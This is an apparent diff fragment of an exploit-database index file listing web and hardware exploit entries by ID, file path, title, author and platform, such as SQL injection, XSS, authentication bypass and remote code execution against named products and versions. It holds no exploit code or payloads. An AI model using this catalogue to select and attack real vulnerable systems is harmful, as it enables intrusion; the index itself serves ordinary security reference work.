49386,exploits/hardware/webapps/49386.txt,"iBall-Baton WRA150N Rom-0 Backup - File Disclosure (Sensitive Information)",1970-01-01,h4cks1n,webapps,hardware, 49386,exploits/hardware/webapps/49386.txt,"iBall-Baton WRA150N Rom-0 Backup - File Disclosure (Sensitive Information)",1970-01-01,h4cks1n,webapps,hardware,
@ -43865,11 +43838,9 @@ id,file,description,date,author,type,platform,port
49459,exploits/hardware/webapps/49459.txt,"Selea Targa IP OCR-ANPR Camera - RTP/RTSP/M-JPEG Stream Disclosure (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware, 49459,exploits/hardware/webapps/49459.txt,"Selea Targa IP OCR-ANPR Camera - RTP/RTSP/M-JPEG Stream Disclosure (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware,
49460,exploits/hardware/webapps/49460.sh,"Selea Targa IP OCR-ANPR Camera - 'addr' Remote Code Execution (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware, 49460,exploits/hardware/webapps/49460.sh,"Selea Targa IP OCR-ANPR Camera - 'addr' Remote Code Execution (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware,
49461,exploits/java/webapps/49461.py,"Oracle WebLogic Server 14.1.1.0 - RCE (Authenticated)",1970-01-01,Photubias,webapps,java, 49461,exploits/java/webapps/49461.py,"Oracle WebLogic Server 14.1.1.0 - RCE (Authenticated)",1970-01-01,Photubias,webapps,java,
49462,exploits/php/webapps/49462.py,"Library System 1.0 - Authentication Bypass Via SQL Injection",1970-01-01,"Himanshu Shukla",webapps,php,
49463,exploits/php/webapps/49463.py,"CASAP Automated Enrollment System 1.0 - Authentication Bypass",1970-01-01,"Himanshu Shukla",webapps,php, 49463,exploits/php/webapps/49463.py,"CASAP Automated Enrollment System 1.0 - Authentication Bypass",1970-01-01,"Himanshu Shukla",webapps,php,
49464,exploits/multiple/webapps/49464.py,"ERPNext 12.14.0 - SQL Injection (Authenticated)",1970-01-01,Hodorsec,webapps,multiple, 49464,exploits/multiple/webapps/49464.py,"ERPNext 12.14.0 - SQL Injection (Authenticated)",1970-01-01,Hodorsec,webapps,multiple,
49465,exploits/multiple/webapps/49465.py,"Atlassian Confluence Widget Connector Macro - SSTI",1970-01-01,46o60,webapps,multiple, 49465,exploits/multiple/webapps/49465.py,"Atlassian Confluence Widget Connector Macro - SSTI",1970-01-01,46o60,webapps,multiple,
49467,exploits/php/webapps/49467.txt,"MyBB Timeline Plugin 1.0 - Cross-Site Scripting / CSRF",1970-01-01,0xB9,webapps,php,
49468,exploits/php/webapps/49468.txt,"Collabtive 3.1 - 'address' Persistent Cross-Site Scripting",1970-01-01,"Deha Berkin Bir",webapps,php, 49468,exploits/php/webapps/49468.txt,"Collabtive 3.1 - 'address' Persistent Cross-Site Scripting",1970-01-01,"Deha Berkin Bir",webapps,php,
49469,exploits/php/webapps/49469.txt,"CASAP Automated Enrollment System 1.0 - 'First Name' Stored XSS",1970-01-01,"Anita Gaud",webapps,php, 49469,exploits/php/webapps/49469.txt,"CASAP Automated Enrollment System 1.0 - 'First Name' Stored XSS",1970-01-01,"Anita Gaud",webapps,php,
49470,exploits/php/webapps/49470.txt,"CASAP Automated Enrollment System 1.0 - 'route' Stored XSS",1970-01-01,"Richard Jones",webapps,php, 49470,exploits/php/webapps/49470.txt,"CASAP Automated Enrollment System 1.0 - 'route' Stored XSS",1970-01-01,"Richard Jones",webapps,php,
@ -43896,7 +43867,6 @@ id,file,description,date,author,type,platform,port
49496,exploits/php/webapps/49496.txt,"MyBB Hide Thread Content Plugin 1.0 - Information Disclosure",1970-01-01,0xB9,webapps,php, 49496,exploits/php/webapps/49496.txt,"MyBB Hide Thread Content Plugin 1.0 - Information Disclosure",1970-01-01,0xB9,webapps,php,
49497,exploits/php/webapps/49497.txt,"Simple Public Chat Room 1.0 - Authentication Bypass SQLi",1970-01-01,"Richard Jones",webapps,php, 49497,exploits/php/webapps/49497.txt,"Simple Public Chat Room 1.0 - Authentication Bypass SQLi",1970-01-01,"Richard Jones",webapps,php,
49498,exploits/php/webapps/49498.txt,"Simple Public Chat Room 1.0 - 'msg' Stored Cross-Site Scripting",1970-01-01,"Richard Jones",webapps,php, 49498,exploits/php/webapps/49498.txt,"Simple Public Chat Room 1.0 - 'msg' Stored Cross-Site Scripting",1970-01-01,"Richard Jones",webapps,php,
49499,exploits/hardware/webapps/49499.py,"SonicWall SSL-VPN 8.0.0.0 - 'shellshock/visualdoor' Remote Code Execution (Unauthenticated)",1970-01-01,"Darren Martyn",webapps,hardware,
49501,exploits/php/webapps/49501.txt,"Zoo Management System 1.0 - 'anid' SQL Injection",1970-01-01,"Zeyad Azima",webapps,php, 49501,exploits/php/webapps/49501.txt,"Zoo Management System 1.0 - 'anid' SQL Injection",1970-01-01,"Zeyad Azima",webapps,php,
49502,exploits/php/webapps/49502.txt,"User Management System 1.0 - 'uid' SQL Injection",1970-01-01,"Zeyad Azima",webapps,php, 49502,exploits/php/webapps/49502.txt,"User Management System 1.0 - 'uid' SQL Injection",1970-01-01,"Zeyad Azima",webapps,php,
49503,exploits/php/webapps/49503.txt,"Park Ticketing Management System 1.0 - 'viewid' SQL Injection",1970-01-01,"Zeyad Azima",webapps,php, 49503,exploits/php/webapps/49503.txt,"Park Ticketing Management System 1.0 - 'viewid' SQL Injection",1970-01-01,"Zeyad Azima",webapps,php,
@ -43953,14 +43923,11 @@ id,file,description,date,author,type,platform,port
49602,exploits/multiple/webapps/49602.py,"VMware vCenter Server 7.0 - Unauthenticated File Upload",1970-01-01,Photubias,webapps,multiple, 49602,exploits/multiple/webapps/49602.py,"VMware vCenter Server 7.0 - Unauthenticated File Upload",1970-01-01,Photubias,webapps,multiple,
49603,exploits/php/webapps/49603.py,"Online Catering Reservation System 1.0 - Remote Code Execution (Unauthenticated)",1970-01-01,"Christian Vierschilling",webapps,php, 49603,exploits/php/webapps/49603.py,"Online Catering Reservation System 1.0 - Remote Code Execution (Unauthenticated)",1970-01-01,"Christian Vierschilling",webapps,php,
49604,exploits/php/webapps/49604.py,"Covid-19 Contact Tracing System 1.0 - Remote Code Execution (Unauthenticated)",1970-01-01,"Christian Vierschilling",webapps,php, 49604,exploits/php/webapps/49604.py,"Covid-19 Contact Tracing System 1.0 - Remote Code Execution (Unauthenticated)",1970-01-01,"Christian Vierschilling",webapps,php,
49605,exploits/php/webapps/49605.txt,"Web Based Quiz System 1.0 - 'MCQ options' Persistent/Stored Cross-Site Scripting",1970-01-01,"Praharsh Kumar Singh",webapps,php,
49606,exploits/php/webapps/49606.py,"Tiny Tiny RSS - Remote Code Execution",1970-01-01,"Daniel Neagaru",webapps,php, 49606,exploits/php/webapps/49606.py,"Tiny Tiny RSS - Remote Code Execution",1970-01-01,"Daniel Neagaru",webapps,php,
49607,exploits/php/webapps/49607.txt,"Web Based Quiz System 1.0 - 'name' Persistent/Stored Cross-Site Scripting",1970-01-01,"P.Naveen Kumar",webapps,php,
49608,exploits/php/webapps/49608.rb,"Zen Cart 1.5.7b - Remote Code Execution (Authenticated)",1970-01-01,"Mücahit Saratar",webapps,php, 49608,exploits/php/webapps/49608.rb,"Zen Cart 1.5.7b - Remote Code Execution (Authenticated)",1970-01-01,"Mücahit Saratar",webapps,php,
49609,exploits/php/webapps/49609.txt,"Local Services Search Engine Management System (LSSMES) 1.0 - 'name' Persistent Cross-Site Scripting (XSS)",1970-01-01,"Tushar Vaidya",webapps,php, 49609,exploits/php/webapps/49609.txt,"Local Services Search Engine Management System (LSSMES) 1.0 - 'name' Persistent Cross-Site Scripting (XSS)",1970-01-01,"Tushar Vaidya",webapps,php,
49610,exploits/php/webapps/49610.txt,"Local Services Search Engine Management System (LSSMES) 1.0 - Blind & Error based SQL injection (Authenticated)",1970-01-01,"Tushar Vaidya",webapps,php, 49610,exploits/php/webapps/49610.txt,"Local Services Search Engine Management System (LSSMES) 1.0 - Blind & Error based SQL injection (Authenticated)",1970-01-01,"Tushar Vaidya",webapps,php,
49614,exploits/php/webapps/49614.txt,"e107 CMS 2.3.0 - CSRF",1970-01-01,Tadjmen,webapps,php, 49614,exploits/php/webapps/49614.txt,"e107 CMS 2.3.0 - CSRF",1970-01-01,Tadjmen,webapps,php,
49615,exploits/php/webapps/49615.txt,"Online Ordering System 1.0 - Arbitrary File Upload to Remote Code Execution",1970-01-01,"Suraj Bhosale",webapps,php,
49616,exploits/php/webapps/49616.txt,"Textpattern CMS 4.8.4 - 'Comments' Persistent Cross-Site Scripting (XSS)",1970-01-01,"Tushar Vaidya",webapps,php, 49616,exploits/php/webapps/49616.txt,"Textpattern CMS 4.8.4 - 'Comments' Persistent Cross-Site Scripting (XSS)",1970-01-01,"Tushar Vaidya",webapps,php,
49617,exploits/php/webapps/49617.txt,"Textpattern CMS 4.9.0-dev - 'Excerpt' Persistent Cross-Site Scripting (XSS)",1970-01-01,"Tushar Vaidya",webapps,php, 49617,exploits/php/webapps/49617.txt,"Textpattern CMS 4.9.0-dev - 'Excerpt' Persistent Cross-Site Scripting (XSS)",1970-01-01,"Tushar Vaidya",webapps,php,
49618,exploits/php/webapps/49618.txt,"Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)",1970-01-01,"Suraj Bhosale",webapps,php, 49618,exploits/php/webapps/49618.txt,"Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)",1970-01-01,"Suraj Bhosale",webapps,php,
@ -43977,7 +43944,6 @@ id,file,description,date,author,type,platform,port
49639,exploits/php/webapps/49639.txt,"Monitoring System (Dashboard) 1.0 - 'uname' SQL Injection",1970-01-01,"Richard Jones",webapps,php, 49639,exploits/php/webapps/49639.txt,"Monitoring System (Dashboard) 1.0 - 'uname' SQL Injection",1970-01-01,"Richard Jones",webapps,php,
49640,exploits/php/webapps/49640.py,"Monitoring System (Dashboard) 1.0 - File Upload RCE (Authenticated)",1970-01-01,"Richard Jones",webapps,php, 49640,exploits/php/webapps/49640.py,"Monitoring System (Dashboard) 1.0 - File Upload RCE (Authenticated)",1970-01-01,"Richard Jones",webapps,php,
49642,exploits/php/webapps/49642.txt,"Zenario CMS 8.8.53370 - 'id' Blind SQL Injection",1970-01-01,"Balaji Ayyasamy",webapps,php, 49642,exploits/php/webapps/49642.txt,"Zenario CMS 8.8.53370 - 'id' Blind SQL Injection",1970-01-01,"Balaji Ayyasamy",webapps,php,
49643,exploits/php/webapps/49643.txt,"MagpieRSS 0.72 - 'url' Command Injection and Server Side Request Forgery",1970-01-01,bl4ckh4ck5,webapps,php,
49644,exploits/php/webapps/49644.txt,"rConfig 3.9.6 - 'path' Local File Inclusion (Authenticated)",1970-01-01,"Murat ŞEKER",webapps,php, 49644,exploits/php/webapps/49644.txt,"rConfig 3.9.6 - 'path' Local File Inclusion (Authenticated)",1970-01-01,"Murat ŞEKER",webapps,php,
49649,exploits/multiple/webapps/49649.txt,"openMAINT openMAINT 2.1-3.3-b - 'Multiple' Persistent Cross-Site Scripting",1970-01-01,"Hosein Vita",webapps,multiple, 49649,exploits/multiple/webapps/49649.txt,"openMAINT openMAINT 2.1-3.3-b - 'Multiple' Persistent Cross-Site Scripting",1970-01-01,"Hosein Vita",webapps,multiple,
49650,exploits/multiple/webapps/49650.py,"Sonlogger 4.2.3.3 - SuperAdmin Account Creation / Information Disclosure",1970-01-01,"Berkan Er",webapps,multiple, 49650,exploits/multiple/webapps/49650.py,"Sonlogger 4.2.3.3 - SuperAdmin Account Creation / Information Disclosure",1970-01-01,"Berkan Er",webapps,multiple,
@ -43995,11 +43961,6 @@ id,file,description,date,author,type,platform,port
49674,exploits/multiple/webapps/49674.txt,"VestaCP 0.9.8 - 'v_sftp_licence' Command Injection",1970-01-01,"numan türle",webapps,multiple, 49674,exploits/multiple/webapps/49674.txt,"VestaCP 0.9.8 - 'v_sftp_licence' Command Injection",1970-01-01,"numan türle",webapps,multiple,
49676,exploits/hardware/webapps/49676.txt,"SOYAL Biometric Access Control System 5.0 - Master Code Disclosure",1970-01-01,LiquidWorm,webapps,hardware, 49676,exploits/hardware/webapps/49676.txt,"SOYAL Biometric Access Control System 5.0 - Master Code Disclosure",1970-01-01,LiquidWorm,webapps,hardware,
49677,exploits/hardware/webapps/49677.html,"SOYAL Biometric Access Control System 5.0 - 'Change Admin Password' CSRF",1970-01-01,LiquidWorm,webapps,hardware, 49677,exploits/hardware/webapps/49677.html,"SOYAL Biometric Access Control System 5.0 - 'Change Admin Password' CSRF",1970-01-01,LiquidWorm,webapps,hardware,
49680,exploits/hardware/webapps/49680.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated)",1970-01-01,LiquidWorm,webapps,hardware,
49681,exploits/hardware/webapps/49681.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Authentication Bypass",1970-01-01,LiquidWorm,webapps,hardware,
49683,exploits/hardware/webapps/49683.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution",1970-01-01,LiquidWorm,webapps,hardware,
49684,exploits/hardware/webapps/49684.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Factory Reset (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware,
49686,exploits/hardware/webapps/49686.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Config Download (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware,
49687,exploits/php/webapps/49687.txt,"Online News Portal 1.0 - 'name' SQL Injection",1970-01-01,"Richard Jones",webapps,php, 49687,exploits/php/webapps/49687.txt,"Online News Portal 1.0 - 'name' SQL Injection",1970-01-01,"Richard Jones",webapps,php,
49688,exploits/php/webapps/49688.txt,"Online News Portal 1.0 - 'Multiple' Stored Cross-Site Scripting",1970-01-01,"Richard Jones",webapps,php, 49688,exploits/php/webapps/49688.txt,"Online News Portal 1.0 - 'Multiple' Stored Cross-Site Scripting",1970-01-01,"Richard Jones",webapps,php,
49693,exploits/php/webapps/49693.php,"WordPress Plugin Delightful Downloads Jquery File Tree 1.6.6 - Path Traversal",1970-01-01,"Nicholas Ferreira",webapps,php, 49693,exploits/php/webapps/49693.php,"WordPress Plugin Delightful Downloads Jquery File Tree 1.6.6 - Path Traversal",1970-01-01,"Nicholas Ferreira",webapps,php,
@ -44010,10 +43971,7 @@ id,file,description,date,author,type,platform,port
49708,exploits/hardware/webapps/49708.txt,"Linksys EA7500 2.0.8.194281 - Cross-Site Scripting",1970-01-01,MiningOmerta,webapps,hardware, 49708,exploits/hardware/webapps/49708.txt,"Linksys EA7500 2.0.8.194281 - Cross-Site Scripting",1970-01-01,MiningOmerta,webapps,hardware,
49709,exploits/hardware/webapps/49709.txt,"Genexis Platinum-4410 P4410-V2-1.31A - 'start_addr' Persistent Cross-Site Scripting",1970-01-01,"Jithin KS",webapps,hardware, 49709,exploits/hardware/webapps/49709.txt,"Genexis Platinum-4410 P4410-V2-1.31A - 'start_addr' Persistent Cross-Site Scripting",1970-01-01,"Jithin KS",webapps,hardware,
49711,exploits/php/webapps/49711.py,"Dolibarr ERP/CRM 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE)",1970-01-01,"Andrea Gonzalez",webapps,php, 49711,exploits/php/webapps/49711.py,"Dolibarr ERP/CRM 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE)",1970-01-01,"Andrea Gonzalez",webapps,php,
49712,exploits/php/webapps/49712.html,"GetSimple CMS Custom JS Plugin 0.1 - CSRF to Persistent XSS",1970-01-01,"Abhishek Joshi",webapps,php,
49713,exploits/php/webapps/49713.txt,"Regis Inventory And Monitoring System 1.0 - 'Item List' Stored XSS",1970-01-01,"George Tsimpidas",webapps,php,
49714,exploits/php/webapps/49714.txt,"Moodle 3.10.3 - 'label' Persistent Cross Site Scripting",1970-01-01,Vincent666,webapps,php, 49714,exploits/php/webapps/49714.txt,"Moodle 3.10.3 - 'label' Persistent Cross Site Scripting",1970-01-01,Vincent666,webapps,php,
49665,exploits/php/webapps/49665.txt,"rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (1)",1970-01-01,"Murat ŞEKER",webapps,php,
49718,exploits/php/webapps/49718.txt,"WordPress Plugin WP Super Cache 1.7.1 - Remote Code Execution (Authenticated)",1970-01-01,m0ze,webapps,php, 49718,exploits/php/webapps/49718.txt,"WordPress Plugin WP Super Cache 1.7.1 - Remote Code Execution (Authenticated)",1970-01-01,m0ze,webapps,php,
49720,exploits/hardware/webapps/49720.txt,"TP-Link Devices - 'setDefaultHostname' Stored Cross-site Scripting (Unauthenticated)",1970-01-01,"Smriti Gaba",webapps,hardware, 49720,exploits/hardware/webapps/49720.txt,"TP-Link Devices - 'setDefaultHostname' Stored Cross-site Scripting (Unauthenticated)",1970-01-01,"Smriti Gaba",webapps,hardware,
49721,exploits/php/webapps/49721.txt,"Concrete5 8.5.4 - 'name' Stored XSS",1970-01-01,"Quadron Research Lab",webapps,php, 49721,exploits/php/webapps/49721.txt,"Concrete5 8.5.4 - 'name' Stored XSS",1970-01-01,"Quadron Research Lab",webapps,php,
@ -44035,7 +43993,6 @@ id,file,description,date,author,type,platform,port
49742,exploits/php/webapps/49742.py,"OpenEMR 4.1.0 - 'u' SQL Injection",1970-01-01,"Michael Ikua",webapps,php, 49742,exploits/php/webapps/49742.py,"OpenEMR 4.1.0 - 'u' SQL Injection",1970-01-01,"Michael Ikua",webapps,php,
49743,exploits/windows/webapps/49743.py,"Mini Mouse 9.2.0 - Remote Code Execution",1970-01-01,gosh,webapps,windows, 49743,exploits/windows/webapps/49743.py,"Mini Mouse 9.2.0 - Remote Code Execution",1970-01-01,gosh,webapps,windows,
49744,exploits/windows/webapps/49744.txt,"Mini Mouse 9.2.0 - Path Traversal",1970-01-01,gosh,webapps,windows, 49744,exploits/windows/webapps/49744.txt,"Mini Mouse 9.2.0 - Path Traversal",1970-01-01,gosh,webapps,windows,
49747,exploits/ios/webapps/49747.txt,"Mini Mouse 9.3.0 - Local File inclusion / Path Traversal",1970-01-01,gosh,webapps,ios,
49748,exploits/multiple/webapps/49748.txt,"Atlassian Jira Service Desk 4.9.1 - Unrestricted File Upload to XSS",1970-01-01,Captain_hook,webapps,multiple, 49748,exploits/multiple/webapps/49748.txt,"Atlassian Jira Service Desk 4.9.1 - Unrestricted File Upload to XSS",1970-01-01,Captain_hook,webapps,multiple,
49749,exploits/php/webapps/49749.txt,"Composr CMS 10.0.36 - Cross Site Scripting",1970-01-01,"Orion Hridoy",webapps,php, 49749,exploits/php/webapps/49749.txt,"Composr CMS 10.0.36 - Cross Site Scripting",1970-01-01,"Orion Hridoy",webapps,php,
49750,exploits/windows/webapps/49750.py,"Dell OpenManage Server Administrator 9.4.0.0 - Arbitrary File Read",1970-01-01,"Rhino Security Labs",webapps,windows, 49750,exploits/windows/webapps/49750.py,"Dell OpenManage Server Administrator 9.4.0.0 - Arbitrary File Read",1970-01-01,"Rhino Security Labs",webapps,windows,
@ -44055,36 +44012,29 @@ id,file,description,date,author,type,platform,port
49769,exploits/multiple/webapps/49769.py,"Horde Groupware Webmail 5.2.22 - Stored XSS",1970-01-01,nu11secur1ty,webapps,multiple, 49769,exploits/multiple/webapps/49769.py,"Horde Groupware Webmail 5.2.22 - Stored XSS",1970-01-01,nu11secur1ty,webapps,multiple,
49771,exploits/multiple/webapps/49771.txt,"Tileserver-gl 3.0.0 - 'key' Reflected Cross-Site Scripting (XSS)",1970-01-01,"Akash Chathoth",webapps,multiple, 49771,exploits/multiple/webapps/49771.txt,"Tileserver-gl 3.0.0 - 'key' Reflected Cross-Site Scripting (XSS)",1970-01-01,"Akash Chathoth",webapps,multiple,
49772,exploits/multiple/webapps/49772.py,"htmly 2.8.0 - 'description' Stored Cross-Site Scripting (XSS)",1970-01-01,nu11secur1ty,webapps,multiple, 49772,exploits/multiple/webapps/49772.py,"htmly 2.8.0 - 'description' Stored Cross-Site Scripting (XSS)",1970-01-01,nu11secur1ty,webapps,multiple,
49774,exploits/php/webapps/49774.py,"GetSimple CMS My SMTP Contact Plugin 1.1.1 - CSRF to RCE",1970-01-01,boku,webapps,php,
49775,exploits/hardware/webapps/49775.html,"Multilaser Router RE018 AC1200 - Cross-Site Request Forgery (Enable Remote Access)",1970-01-01,"Rodolfo Mariano",webapps,hardware, 49775,exploits/hardware/webapps/49775.html,"Multilaser Router RE018 AC1200 - Cross-Site Request Forgery (Enable Remote Access)",1970-01-01,"Rodolfo Mariano",webapps,hardware,
49802,exploits/multiple/webapps/49802.py,"Hasura GraphQL 1.3.3 - Remote Code Execution",1970-01-01,"Dolev Farhi",webapps,multiple, 49802,exploits/multiple/webapps/49802.py,"Hasura GraphQL 1.3.3 - Remote Code Execution",1970-01-01,"Dolev Farhi",webapps,multiple,
49777,exploits/php/webapps/49777.txt,"Fast PHP Chat 1.3 - 'my_item_search' SQL Injection",1970-01-01,"Fatih Coskun",webapps,php, 49777,exploits/php/webapps/49777.txt,"Fast PHP Chat 1.3 - 'my_item_search' SQL Injection",1970-01-01,"Fatih Coskun",webapps,php,
49778,exploits/php/webapps/49778.txt,"WordPress Plugin RSS for Yandex Turbo 1.29 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Himamshu Dilip Kulkarni",webapps,php, 49778,exploits/php/webapps/49778.txt,"WordPress Plugin RSS for Yandex Turbo 1.29 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Himamshu Dilip Kulkarni",webapps,php,
49779,exploits/php/webapps/49779.txt,"BlackCat CMS 1.3.6 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Ömer Hasan Durmuş",webapps,php, 49779,exploits/php/webapps/49779.txt,"BlackCat CMS 1.3.6 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Ömer Hasan Durmuş",webapps,php,
49780,exploits/multiple/webapps/49780.py,"Discourse 2.7.0 - Rate Limit Bypass leads to 2FA Bypass",1970-01-01,Mesh3l_911,webapps,multiple,
49781,exploits/php/webapps/49781.py,"RemoteClinic 2 - 'Multiple' Cross-Site Scripting (XSS)",1970-01-01,nu11secur1ty,webapps,php, 49781,exploits/php/webapps/49781.py,"RemoteClinic 2 - 'Multiple' Cross-Site Scripting (XSS)",1970-01-01,nu11secur1ty,webapps,php,
49795,exploits/php/webapps/49795.txt,"RemoteClinic 2.0 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Saud Ahmad",webapps,php, 49795,exploits/php/webapps/49795.txt,"RemoteClinic 2.0 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Saud Ahmad",webapps,php,
49783,exploits/php/webapps/49783.py,"rconfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (2)",1970-01-01,"Vishwaraj Bhattrai",webapps,php,
49784,exploits/php/webapps/49784.py,"OpenEMR 5.0.2.1 - Remote Code Execution",1970-01-01,Hato0,webapps,php, 49784,exploits/php/webapps/49784.py,"OpenEMR 5.0.2.1 - Remote Code Execution",1970-01-01,Hato0,webapps,php,
49785,exploits/hardware/webapps/49785.txt,"Adtran Personal Phone Manager 10.8.1 - 'emailAddress' Stored Cross-Site Scripting (XSS)",1970-01-01,3ndG4me,webapps,hardware, 49785,exploits/hardware/webapps/49785.txt,"Adtran Personal Phone Manager 10.8.1 - 'emailAddress' Stored Cross-Site Scripting (XSS)",1970-01-01,3ndG4me,webapps,hardware,
49786,exploits/hardware/webapps/49786.txt,"Adtran Personal Phone Manager 10.8.1 - 'Multiple' Reflected Cross-Site Scripting (XSS)",1970-01-01,3ndG4me,webapps,hardware, 49786,exploits/hardware/webapps/49786.txt,"Adtran Personal Phone Manager 10.8.1 - 'Multiple' Reflected Cross-Site Scripting (XSS)",1970-01-01,3ndG4me,webapps,hardware,
49787,exploits/hardware/webapps/49787.txt,"Adtran Personal Phone Manager 10.8.1 - DNS Exfiltration",1970-01-01,3ndG4me,webapps,hardware, 49787,exploits/hardware/webapps/49787.txt,"Adtran Personal Phone Manager 10.8.1 - DNS Exfiltration",1970-01-01,3ndG4me,webapps,hardware,
49788,exploits/php/webapps/49788.rb,"GravCMS 1.10.7 - Unauthenticated Arbitrary YAML Write/Update (Metasploit)",1970-01-01,"Mehmet Ince",webapps,php,
49790,exploits/multiple/webapps/49790.py,"Hasura GraphQL 1.3.3 - Local File Read",1970-01-01,"Dolev Farhi",webapps,multiple, 49790,exploits/multiple/webapps/49790.py,"Hasura GraphQL 1.3.3 - Local File Read",1970-01-01,"Dolev Farhi",webapps,multiple,
49791,exploits/multiple/webapps/49791.py,"Hasura GraphQL 1.3.3 - Service Side Request Forgery (SSRF)",1970-01-01,"Dolev Farhi",webapps,multiple, 49791,exploits/multiple/webapps/49791.py,"Hasura GraphQL 1.3.3 - Service Side Request Forgery (SSRF)",1970-01-01,"Dolev Farhi",webapps,multiple,
49793,exploits/php/webapps/49793.txt,"CMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS)",1970-01-01,bt0,webapps,php, 49793,exploits/php/webapps/49793.txt,"CMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS)",1970-01-01,bt0,webapps,php,
49794,exploits/perl/webapps/49794.py,"OTRS 6.0.1 - Remote Command Execution (2)",1970-01-01,Hex_26,webapps,perl, 49794,exploits/perl/webapps/49794.py,"OTRS 6.0.1 - Remote Command Execution (2)",1970-01-01,Hex_26,webapps,perl,
49797,exploits/php/webapps/49797.txt,"Moodle 3.10.3 - 'url' Persistent Cross Site Scripting",1970-01-01,UVision,webapps,php, 49797,exploits/php/webapps/49797.txt,"Moodle 3.10.3 - 'url' Persistent Cross Site Scripting",1970-01-01,UVision,webapps,php,
49798,exploits/php/webapps/49798.py,"GetSimple CMS My SMTP Contact Plugin 1.1.2 - CSRF to Stored XSS to RCE",1970-01-01,boku,webapps,php,
49799,exploits/multiple/webapps/49799.py,"DzzOffice 2.02.1 - 'Multiple' Cross-Site Scripting (XSS)",1970-01-01,nu11secur1ty,webapps,multiple, 49799,exploits/multiple/webapps/49799.py,"DzzOffice 2.02.1 - 'Multiple' Cross-Site Scripting (XSS)",1970-01-01,nu11secur1ty,webapps,multiple,
49800,exploits/hardware/webapps/49800.html,"Sipwise C5 NGCP CSC - 'Multiple' Stored/Reflected Cross-Site Scripting (XSS)",1970-01-01,LiquidWorm,webapps,hardware,
49801,exploits/hardware/webapps/49801.html,"Sipwise C5 NGCP CSC - Click2Dial Cross-Site Request Forgery (CSRF)",1970-01-01,LiquidWorm,webapps,hardware, 49801,exploits/hardware/webapps/49801.html,"Sipwise C5 NGCP CSC - Click2Dial Cross-Site Request Forgery (CSRF)",1970-01-01,LiquidWorm,webapps,hardware,
49803,exploits/python/webapps/49803.py,"OpenPLC 3 - Remote Code Execution (Authenticated)",1970-01-01,"Fellipe Oliveira",webapps,python, 49803,exploits/python/webapps/49803.py,"OpenPLC 3 - Remote Code Execution (Authenticated)",1970-01-01,"Fellipe Oliveira",webapps,python,
49804,exploits/php/webapps/49804.py,"SEO Panel 4.8.0 - 'order_col' Blind SQL Injection (2)",1970-01-01,nu11secur1ty,webapps,php, 49804,exploits/php/webapps/49804.py,"SEO Panel 4.8.0 - 'order_col' Blind SQL Injection (2)",1970-01-01,nu11secur1ty,webapps,php,
49805,exploits/php/webapps/49805.txt,"Kimai 1.14 - CSV Injection",1970-01-01,"Mohammed Aloraimi",webapps,php, 49805,exploits/php/webapps/49805.txt,"Kimai 1.14 - CSV Injection",1970-01-01,"Mohammed Aloraimi",webapps,php,
49806,exploits/php/webapps/49806.txt,"Montiorr 1.7.6m - File Upload to XSS",1970-01-01,"Ahmad Shakla",webapps,php, 49806,exploits/php/webapps/49806.txt,"Montiorr 1.7.6m - File Upload to XSS",1970-01-01,"Ahmad Shakla",webapps,php,
49808,exploits/php/webapps/49808.txt,"Kirby CMS 3.5.3.1 - 'file' Cross-Site Scripting (XSS)",1970-01-01,"Sreenath Raghunathan",webapps,php, 49808,exploits/php/webapps/49808.txt,"Kirby CMS 3.5.3.1 - 'file' Cross-Site Scripting (XSS)",1970-01-01,"Sreenath Raghunathan",webapps,php,
49810,exploits/php/webapps/49810.py,"Cacti 1.2.12 - 'filter' SQL Injection / Remote Code Execution",1970-01-01,"Leonardo Paiva",webapps,php,
49811,exploits/php/webapps/49811.txt,"FOGProject 1.5.9 - File Upload RCE (Authenticated)",1970-01-01,sml,webapps,php, 49811,exploits/php/webapps/49811.txt,"FOGProject 1.5.9 - File Upload RCE (Authenticated)",1970-01-01,sml,webapps,php,
49813,exploits/multiple/webapps/49813.py,"NodeBB Plugin Emoji 3.2.1 - Arbitrary File Write",1970-01-01,1F98D,webapps,multiple, 49813,exploits/multiple/webapps/49813.py,"NodeBB Plugin Emoji 3.2.1 - Arbitrary File Write",1970-01-01,1F98D,webapps,multiple,
49814,exploits/php/webapps/49814.txt,"Moodle 3.6.1 - Persistent Cross-Site Scripting (XSS)",1970-01-01,"Fariskhi Vidyan",webapps,php, 49814,exploits/php/webapps/49814.txt,"Moodle 3.6.1 - Persistent Cross-Site Scripting (XSS)",1970-01-01,"Fariskhi Vidyan",webapps,php,
@ -44202,7 +44152,6 @@ id,file,description,date,author,type,platform,port
49985,exploits/multiple/webapps/49985.txt,"Grocery crud 1.6.4 - 'order_by' SQL Injection",1970-01-01,TonyShavez,webapps,multiple, 49985,exploits/multiple/webapps/49985.txt,"Grocery crud 1.6.4 - 'order_by' SQL Injection",1970-01-01,TonyShavez,webapps,multiple,
49986,exploits/multiple/webapps/49986.txt,"Solar-Log 500 2.8.2 - Incorrect Access Control",1970-01-01,Luca.Chiou,webapps,multiple, 49986,exploits/multiple/webapps/49986.txt,"Solar-Log 500 2.8.2 - Incorrect Access Control",1970-01-01,Luca.Chiou,webapps,multiple,
